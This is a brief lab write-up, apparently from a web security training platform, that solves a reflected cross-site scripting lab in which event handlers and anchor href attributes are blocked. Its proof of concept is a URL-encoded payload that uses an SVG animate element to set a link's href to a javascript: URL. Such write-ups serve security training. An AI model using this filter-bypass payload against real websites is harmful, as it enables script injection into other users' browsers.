Reflected XSS with event handlers and href attributes blocked

Description

The website in this lab contains a reflected XSS vulnerability with some whitelisted tags, but all events and anchor href attributes are blocked.

Reproduction and proof of concept

  1. Visit the following URL, replacing 0aea002d04f460bbc1d2491e00ad00da with your lab ID:

https://0aea002d04f460bbc1d2491e00ad00da.web-security-academy.net/?search=%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E